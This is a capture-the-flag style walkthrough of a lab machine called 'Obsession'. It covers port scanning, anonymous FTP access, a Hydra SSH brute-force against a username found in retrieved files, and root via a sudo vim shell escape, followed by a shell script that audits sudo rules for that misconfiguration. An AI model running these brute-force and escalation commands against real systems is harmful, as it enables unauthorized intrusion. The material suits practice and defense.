Obsession
export TARGET_IP=172.17.0.2
nmap -p0- $TARGET_IP
Port | State | Service |
---|---|---|
21/tcp | open | FTP |
22/tcp | open | SSH |
80/tcp | open | HTTP |
FTP Service
Anonymous Login
A common misconfiguration in FTP servers is allowing anonymous access. An attempt was made to log in using anonymous credentials.
ftp $TARGET_IP
Credentials:
- Username: `anonymous`
- Password: (blank)
Result: The anonymous login was successful, granting access to the FTP server.
File Discovery and Retrieval
The `ls` command was used to list the contents of the accessible directory.
ftp> ls
Output:
-rw-r--r-- 1 0 0 667 Jun 18 2024 chat-gonza.txt
-rw-r--r-- 1 0 0 315 Jun 18 2024 pendientes.txt
Two files, `chat-gonza.txt` and `pendientes.txt`, were discovered and subsequently downloaded using the `get` command.
ftp> get chat-gonza.txt
ftp> get pendientes.txt
Content Analysis
The retrieved files were analyzed for sensitive information.
cat chat-gonza.txt pendientes.txt
Content Summary:
- `chat-gonza.txt`: A chat log between two users, "Gonza" and "Russoski," discussing a video hosted on a secure location within Russoski's computer and mentioning a gym session.
- `pendientes.txt`: A to-do list containing tasks related to a certification, online services, a vulnerable lab project, and security configurations.
Inferred Information: Potential usernames: `gonza` and `russoski`. Visiting the web page at http://172.17.0.2/ and doing some basic investigation suggests that Russoski could be behind it.
SSH Brute-Force
Based on the discovered username `russoski` and the common password list `rockyou.txt`, a brute-force attack was launched against the SSH service using Hydra.
hydra -l "russoski" -P /usr/share/wordlists/rockyou.txt ssh://$TARGET_IP -f
Result: The attack successfully identified the password `iloveme` for the user `russoski`.
Privilege Escalation
Using the obtained credentials, a successful SSH connection was established.
ssh russoski@$TARGET_IP
The `sudo -l` command revealed that the user `russoski` could execute `vim` as root without a password.
sudo -l
Output:
Matching Defaults entries for russoski on 96d1d89bd82e:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User russoski may run the following commands on 96d1d89bd82e:
(root) NOPASSWD: /usr/bin/vim
Exploiting Vim for Root Shell
Leveraging the GTFOBins resource (https://gtfobins.github.io/gtfobins/vim/#sudo), a root shell was obtained by executing Vim with a specific command.
sudo vim -c ':!/bin/sh'
id
Result: Successful privilege escalation to root, confirmed by the `id` command output: `uid=0(root) gid=0(root) groups=0(root)`.
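A defensive check for the misconfiguration shown in the `sudo -l` output above, as an added example that is not part of the original write-up: it flags sudo rules that grant a program able to spawn a shell. The `ESCAPE_CAPABLE` list, the function names and the `sudoedit` file path are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from the original write-up): audit `sudo -l` output for
# rules that hand out a program able to spawn a shell.
# ESCAPE_CAPABLE is a short constructed list (assumption), not a full inventory.
ESCAPE_CAPABLE="vim vi nano less more man awk find perl python3 bash sh"

# Reads `sudo -l` output on stdin, prints "<runas> <auth> <command> <reason>"
# per risky rule, and returns 1 if anything was flagged (0 otherwise).
audit_sudo_l() {
  awk -v list="$ESCAPE_CAPABLE" '
    BEGIN { n = split(list, a, " "); for (i = 1; i <= n; i++) risky[a[i]] = 1 }
    /^[ \t]*\(/ {                        # rule line: (root) NOPASSWD: /usr/bin/vim
      line = $0; sub(/^[ \t]*/, "", line)
      runas = line; sub(/\).*/, "", runas); sub(/^\(/, "", runas)
      auth = (line ~ /NOPASSWD:/) ? "NOPASSWD" : "PASSWD"
      sub(/^\([^)]*\)[ \t]*/, "", line)  # drop the run-as spec
      gsub(/[A-Z_]+:[ \t]*/, "", line)   # drop tags such as NOPASSWD: or SETENV:
      m = split(line, cmds, /,[ \t]*/)
      for (j = 1; j <= m; j++) {
        split(cmds[j], w, " ")           # first word is the binary path
        if (w[1] == "ALL") { print runas, auth, "ALL", "unrestricted"; found = 1; continue }
        k = split(w[1], p, "/"); base = p[k]
        if (base in risky) { print runas, auth, w[1], "shell-escape"; found = 1 }
      }
    }
    END { exit (found ? 1 : 0) }'
}

# Sample input: the rule from the sudo -l output shown above.
sample_vulnerable() {
  cat <<'EOF'
User russoski may run the following commands on 96d1d89bd82e:
    (root) NOPASSWD: /usr/bin/vim
EOF
}

# Constructed hardened alternative: sudoedit on one file (path is hypothetical).
sample_hardened() {
  cat <<'EOF'
User russoski may run the following commands on 96d1d89bd82e:
    (root) NOPASSWD: sudoedit /etc/app/config.yml
EOF
}

# Demo run on the vulnerable sample; on a live host use: sudo -l | audit_sudo_l
sample_vulnerable | audit_sudo_l || true
```

Granting `sudoedit` on a specific file lets the user edit it with root privileges while the editor itself runs as the invoking user, so an editor shell escape does not yield root.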